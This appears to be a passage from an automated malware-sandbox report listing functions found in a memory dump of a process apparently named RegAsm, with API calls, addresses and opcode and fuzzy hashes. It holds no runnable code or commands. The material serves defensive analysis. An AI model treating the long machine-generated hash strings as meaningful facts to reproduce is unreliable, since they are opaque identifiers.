                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@DeleteObject
                                                                                • String ID: r!A
                                                                                • API String ID: 1103273653-628097481
                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID:
                                                                                • API String ID: 438689982-0
                                                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$memset
                                                                                • String ID:
                                                                                • API String ID: 1860491036-0
                                                                                • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcmp.MSVCRT ref: 00408AF3
                                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                • memcmp.MSVCRT ref: 00408B2B
                                                                                • memcmp.MSVCRT ref: 00408B5C
                                                                                • memcpy.MSVCRT ref: 00408B79
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp$memcpy
                                                                                • String ID:
                                                                                • API String ID: 231171946-0
                                                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@
                                                                                • String ID:
                                                                                • API String ID: 1033339047-0
                                                                                • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49